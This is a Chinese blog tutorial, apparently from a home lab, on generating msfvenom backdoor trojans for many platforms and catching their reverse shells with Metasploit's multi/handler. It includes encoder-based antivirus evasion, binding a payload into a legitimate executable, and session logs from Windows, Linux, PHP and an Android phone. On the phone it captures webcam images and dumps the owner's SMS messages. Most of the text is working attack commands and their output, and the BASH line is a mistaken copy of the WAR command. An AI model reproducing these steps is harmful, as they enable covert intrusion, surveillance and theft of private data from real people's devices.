Msfvenom生成后门及运用
本篇文章将会使用msfvenom来创建木马,然后通过msfconsole中的expoit/multi/handler来反弹靶机shell。
后门的生成:
首先通过各种操作系统,脚本语言来生成后门:
常用参数说明:
e 编码方式 |
---|
i 编码次数 |
b 在生成的程序中避免出现的值 |
f 输出格式 |
p 选择payload |
l 查看所有payload |
a 选择架构平台(x86|x64|x86_64) |
o 文件输出 |
c 添加自己的shellcode |
x|k 捆绑 |
基本格式:
msfvenom -p <payload> <payload options> -f <format> -o <path>
木马简单免杀:
msfvenom -p <payload> -e <encoder > -i <encoder times> -n <nopsled> -f <format> -o <path>
msfvenom –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe
普通捆绑:
msfvenom –p windows/meterpreter/reverse_tcp –platform windows –a x86 –x C:\nomal.exe –k –f exe –o C:\shell.exe
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Android:
msfvenom -p android/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.apk
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.asp
ASPX:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f aspx > shell.aspx
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
BASH:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
PERL:
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
PYTHON:
msfvenom -p python/meterpreter/reverser_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
基于现在网络安全意识的提高,普通的木马很难在win上存活,需要经过多次的复杂的编码,所以我们学习的路还很长!
中文翻译:
-l, --list <type> 列出指定类型的所有模块 类型包括: payloads, encoders, nops, platforms, archs, formats, all
-p, --payload <payload> 指定需要使用的payload(有效载荷)(--list payloads得到payload列表,--list-options得到指定payload的参数) 如果需要使用自定义的payload,请使用'-'或者stdin指定
--list-options 列出指定payload的标准,高级和规避选项 例如:msfvenom -p generic/shell_bind_tcp --list-options 将列出shell_bind_tcp这个payload的各种选项信息
-f, --format <format> 指定输出格式(使用 --list formats 列出所有的格式)
-e, --encoding <encoder> 要使用的编码(使用 --list encoders 列出所有的编码) 用于编码加密
--smallest 使用所有可用的编码器生成尽可能小的有效负载
-a, --arch <arch> 指定payload的目标CPU架构(使用 --list archs 列出所有的CPU架构)
--platform <platform> 指定payload的目标操作系统平台(使用 --list platforms 列出所有的操作系统平台)
-o, --out <path> 将payload保存到文件中
-b, --bad-chars <list> 指定不使用的字符集 例如:不使用'\x00\xff'这两个字符
-n, --nopsled <length> 在payload上添加指定长度的nop指令
-s, --space <length> 设定payload的最大长度 即生成的文件大小
--encoder-space <length> 设定编码payload的最大长度(默认为-s的值)
-i, --iterations <count> 对payload进行编码的次数
-c, --add-code <path> 指定一个自己的win32 shellcode文件
-x, --template <path> 指定一个可执行程序 将payload捆绑其中
例如:原先有个正常文件normal.exe 通过此选项把payload捆绑到这个程序上面
-k, --keep 针对-x中的捆绑程序 将创建新线程执行payload 一般情况-x -k选项一起使用
-v, --var-name <value> 指定用于某些输出格式的自定义变量名称
-t, --timeout <second> 从STDIN读取有效负载时等待的秒数(默认为30, 0为禁用)
-h, --help 查看帮助
msf反弹shell
当我们的木马已经上传到目标靶机系统并正常运行之后,靶机会主动连接我们所指定的ip和端口,形成反弹shell的操作,我们只需要做的是监听kaili的所指定的端口即可。
首先进入msfconsole的shell:
msfconsole
调用监听模块:
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.102:4444
这里可以根据需要设置LHOST与LPORT参数,也可以指定对应的攻击载荷
实践:
这里对市面上主流的操作系统与脚本语言进行实验,这里因为博主实在穷买不起水果电脑,这里MAC的实验直接跳过。
Windows:
win7(靶机):192.168.1.106
Kali(攻击机):192.168.1.102
首先在Kali里面生成基于windows系统的木马:
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
root@kali:~#
使用msf模块进行端口监听(注意这里要设置与木马payload对应的载荷):
msf5 > use exploit/multi/
Display all 340 possibilities? (y or n)
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.102:4444
将后门上传到靶机中并双击运行:
我们回到kali发现已经得到靶机meterpreter的shell了:
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.102:4444
[*] Sending stage (176195 bytes) to 192.168.1.106
[*] Meterpreter session 3 opened (192.168.1.102:4444 -> 192.168.1.106:49164) at 2020-10-01 14:09:34 +0800
meterpreter > getuid
Server username: WY-PC\WY
meterpreter >
Linux:
CentOS7(靶机):192.168.1.103
Kali(攻击机):192.168.1.102
首先在Kali里面生成基于Linux系统的木马:
root@kali:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f elf > shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
root@kali:~#
使用msf模块进行端口监听(注意这里要设置与木马payload对应的载荷):
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcppayload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.102:4444
将后门上传到靶机中并./运行:
[root@localhost ~]# chmod 777 shell.elf
[root@localhost ~]# ./shell.elf &
[1] 2746
[root@localhost ~]# ps -ef |grep shell.elf
root 2746 2504 0 14:22 pts/0 00:00:00 ./shell.elf
root 2754 2504 0 14:23 pts/0 00:00:00 grep --color=auto shell.elf
[root@localhost ~]#
我们回到kali发现已经得到靶机meterpreter的shell了:
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.102:4444
[*] Sending stage (980808 bytes) to 192.168.1.103
[*] Meterpreter session 2 opened (192.168.1.102:4444 -> 192.168.1.103:55342) at 2020-10-01 14:22:57 +0800
meterpreter > getuid
Server username: no-user @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0)
meterpreter >
Android:
MI8(手机):192.168.1.104
Kali(攻击机):192.168.1.102
首先在Kali里面生成基于Android系统的木马:
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 R > shell.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10187 bytes
root@kali:~#
使用msf模块进行端口监听(注意这里要设置与木马payload对应的载荷):
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.102:4444
将后门安装到手机并点击运行:
我们回到kali发现已经得到靶机meterpreter的shell了:
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.102:4444
[*] Sending stage (73808 bytes) to 192.168.1.104
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.104:38078) at 2020-10-01 14:39:51 +0800
meterpreter > sysinfo
Computer : localhost
OS : Android 10 - Linux 4.<...>
Meterpreter : dalvik/android
meterpreter >
拓展:
扫描手机摄像头(这里又两个摄像头前置和后置):
meterpreter > webcam_list
1: Back Camera
2: Front Camera
打开手机摄像头:
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: /root/ohFWZoub.html
[*] Streaming...
[-] webcam_start: Operation failed: 1
meterpreter > Sandbox: unsupported fd-relative fstatat(31, "", 0x7FFE461BC470, 4096)
Sandbox: seccomp sandbox violation: pid 3679, tid 3679, syscall 262, args 31 139979469005566 140730074645616 4096 4096 1.
Sandbox: unsupported fd-relative fstatat(31, "", 0x7FFE461BC370, 4096)
Sandbox: seccomp sandbox violation: pid 3679, tid 3679, syscall 262, args 31 139979469005566 140730074645360 4096 4096 1.
Sandbox: unsupported fd-relative fstatat(31, "", 0x7FFE461BC370, 4096)
Sandbox: seccomp sandbox violation: pid 3679, tid 3679, syscall 262, args 31 139979469005566 140730074645360 4096 4096 1.
Sandbox: unsupported fd-relative fstatat(33, "", 0x7FFCFB734980, 4096)
Sandbox: seccomp sandbox violation: pid 3731, tid 3731, syscall 262, args 33 139698781278974 140724527122816 4096 4096 1.
Sandbox: unsupported fd-relative fstatat(33, "", 0x7FFCFB734880, 4096)
Sandbox: seccomp sandbox violation: pid 3731, tid 3731, syscall 262, args 33 139698781278974 140724527122560 4096 4096 1.
Sandbox: unsupported fd-relative fstatat(33, "", 0x7FFCFB734880, 4096)
Sandbox: seccomp sandbox violation: pid 3731, tid 3731, syscall 262, args 33 139698781278974 140724527122560 4096 4096 1.
Sandbox: unsupported fd-relative fstatat(26, "", 0x7FFFD2AA0540, 4096)
Sandbox: seccomp sandbox violation: pid 3768, tid 3768, syscall 262, args 26 140163614188286 140736727745856 4096 4096 1.
Sandbox: unsupported fd-relative fstatat(26, "", 0x7FFFD2AA0440, 4096)
Sandbox: seccomp sandbox violation: pid 3768, tid 3768, syscall 262, args 26 140163614188286 140736727745600 4096 4096 1.
Sandbox: unsupported fd-relative fstatat(26, "", 0x7FFFD2AA0440, 4096)
Sandbox: seccomp sandbox violation: pid 3768, tid 3768, syscall 262, args 26 140163614188286 140736727745600 4096 4096 1.
这里报很多错,不明所以,可能是因为mi8安全性太高了无法调用摄像头吧(雷军记得打钱
隐秘拍照(这里mi8会有询问是否调用摄像头,这里实验点击是就行了):
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/KzQqTroL.jpeg
不得不说小米对于安全的把控还是可以的
导出电话号码与短信:
meterpreter > dump_contacts
[*] No contacts were found!
meterpreter > dump_sms
[*] Fetching 243 sms messages
[*] SMS messages saved to: sms_dump_20201001145514.txt
这里不知道为啥电话簿没有导出来,不过短信导出来了,不过这里也需要授权
PHP:
CentOS7(靶机):192.168.1.103
------PHP : 5.4.16
------Apache: 2.4.6
Kali(攻击机):192.168.1.102
首先在Kali里面生成基于php脚本语言的木马:
root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f raw > shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 30689 bytes
root@kali:~#
使用msf模块进行端口监听(注意这里要设置与木马payload对应的载荷):
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.102:4444
将木马上传到靶机网站站点中并使用浏览器访问该页面:
访问之前注意要更改木马页面权限chmod 777 shell.php
我们回到kali发现已经得到靶机meterpreter的shell了:
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.102:4444
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:40810) at 2020-10-01 15:20:21 +0800
meterpreter > getuid
Server username: root (0)
特此声明:
此文章仅供学术交流,请勿用于任何非法用途。